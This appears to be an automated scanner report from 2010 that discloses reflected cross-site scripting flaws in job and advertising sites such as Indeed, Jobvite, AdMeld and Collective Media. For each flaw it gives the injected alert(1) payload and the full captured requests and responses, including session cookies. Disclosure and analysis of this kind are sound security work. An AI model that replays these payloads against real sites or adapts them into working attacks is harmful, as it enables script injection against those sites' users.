if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"39457440\",Location:C ...[SNIP]... e Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&', "ar_p72205782": 'exp=1&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:18:12 2010&prad=56621686&arc=39457440&6e07e<script>alert(1)</script>ff145e850bf' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the guestidc cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec734'-alert(1)-'0a941972e36 was submitted in the guestidc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CompanyJobs/Careers.aspx?c=qOX9Vfwz&j=o6HvVfwX&s=IndeedSponsored&k=Job HTTP/1.1 Host: hire.jobvite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=197432630.|1=UserId=d8e1cf65-2b72-4b4f-8694-238686ff5861=1,2=CompanyId=qOX9Vfwz=1,; __utmz=197432630.1290806532.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=197432630.511139945.1290806532.1290806532.1290806532.1; __utmc=197432630; guestidc=d8e1cf65-2b72-4b4f-8694-238686ff5861ec734'-alert(1)-'0a941972e36; __utmb=197432630.2.10.1290806532; ASP.NET_SessionId=vqmcag45nadz14ia3kooz3y4;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 26 Nov 2010 20:56:03 GMT Connection: close Content-Length: 17126
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbbe'%3balert(1)//5ecd75f6dc4 was submitted in the cli cookie. This input was echoed as 2bbbe';alert(1)//5ecd75f6dc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.ny_post/tier2_082410 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d2bbbe'%3balert(1)//5ecd75f6dc4; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7087 Date: Fri, 26 Nov 2010 20:41:26 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-70956833_1290804086","http://ad.doubleclick.net//cm.ny_post/tier2_082410;net=cm;u=,cm-70956833_1290804086,11bbcecf1d09b9d2bbbe';alert(1)//5ecd75f6dc4,none,;;contx=none;dc=d;btg=?","0","0",true);</scr'+'ipt> ...[SNIP]...
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c605"><script>alert(1)</script>892b148ceb1 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/14/nypost/728x90/above-fold?t=1290805811208&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Feedition%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/eedition/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: meld_sess=5a738589-032a-45ab-a7ad-eba47ded68466c605"><script>alert(1)</script>892b148ceb1; D41U=3vrvQaMHmkXr8dbcHThZwml2V9ztwWznqrd2Lpms5UprRgsYB__drgQ; ebNewBandWidth_.tag.admeld.com=7019%3A1290805809882
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTQsICBzaXRlOiAgICAgICAgICJueXBvc3QiLCAgYWQ6ICAgICAgICAgICAzMjE0LCAgbmV0d29yazogICAgICAiYWRicml0ZSIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS05IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI2MjgzMTBkNy01YmNmLTRkZTEtODBhYy04ZmFlMDhiYzY2NjciLCAgdXNlcjogICAgICAgICAiNWE3Mzg1ODktMDMyYS00NWFiLWE3YWQtZWJhNDdkZWQ2ODQ2NmM2MDUiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD44OTJiMTQ4Y2ViMSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJIb3VzdG9uIiwgIGRtYTogICAgICAgICAgNjE4LCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTc0LjEyMi4yMy4yMTgiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiYWJvdmUtZm9sZCIsICBkaXY6ICAgICAgICAgICI2MjgzMTBkNy01YmNmLTRkZTEtODBhYy04ZmFlMDhiYzY2NjciLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5ueXBvc3QuY29tL2VlZGl0aW9uLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDE5LCAgYWNjb3VudF9pZDogICA0NDgsICBuZXR3b3JrX25hbWU6ICJBZEJyaXRlIiwgIHB1Ymxpc2hlcl9uYW1lOiAibnlwb3N0IiwgIGVjcG06ICAgICAgICAgIjEuMTYiLCAgZmVjcG06ICAgICAgICAiMS4xNiIsICBmaWxsOiAgICAgICAgICI3MC42OCIsICBwbGFjZW1lbnQ6ICAgICJhYm92ZS1mb2xkIiwgIHJ1bGU6ICAgICAgICAgImFib3ZlLWZvbGQiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW10sICB0YXJnZXRpbmc6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNiJ9 Content-Length: 1995 Content-Type: text/html Date: Fri, 26 Nov 2010 20:21:37 GMT Connection: close
The value of the atk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d59"><script>alert(1)</script>7fe02f4e4cf was submitted in the atk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pagead/clk?mo=r&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v28d59"><script>alert(1)</script>7fe02f4e4cf HTTP/1.1 Host: www.indeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DCT=4; JSESSIONID=A7159CBE6B1CF525312CB1BC96C2951C.usA_iad-web8; NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660; CTK=15i4tbl4c0k422n0;
<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lY ...[SNIP]... VLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v28d59"><script>alert(1)</script>7fe02f4e4cf&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=20ce44ad3585bc2f"> ...[SNIP]...
1.349. http://www.indeed.com/pagead/clk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.indeed.com
Path:
/pagead/clk
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa74e"><script>alert(1)</script>6c40311fe84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pagead/clk?mo=r&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v&fa74e"><script>alert(1)</script>6c40311fe84=1 HTTP/1.1 Host: www.indeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DCT=4; JSESSIONID=A7159CBE6B1CF525312CB1BC96C2951C.usA_iad-web8; NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660; CTK=15i4tbl4c0k422n0;
<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lY ...[SNIP]... LAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v&fa74e"><script>alert(1)</script>6c40311fe84=1&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=0b338f7b71c5834e"> ...[SNIP]...
The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba72"><script>alert(1)</script>e92ccd37ea was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pagead/clk?mo=r&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1cba72"><script>alert(1)</script>e92ccd37ea&atk=15i4tbk100g3g34v HTTP/1.1 Host: www.indeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DCT=4; JSESSIONID=A7159CBE6B1CF525312CB1BC96C2951C.usA_iad-web8; NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660; CTK=15i4tbl4c0k422n0;
<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lY ...[SNIP]... LD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1cba72"><script>alert(1)</script>e92ccd37ea&atk=15i4tbk100g3g34v&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=b18ec44b6577a165"> ...[SNIP]...
Report generated by XSS.CX at Fri Nov 26 16:22:59 CST 2010.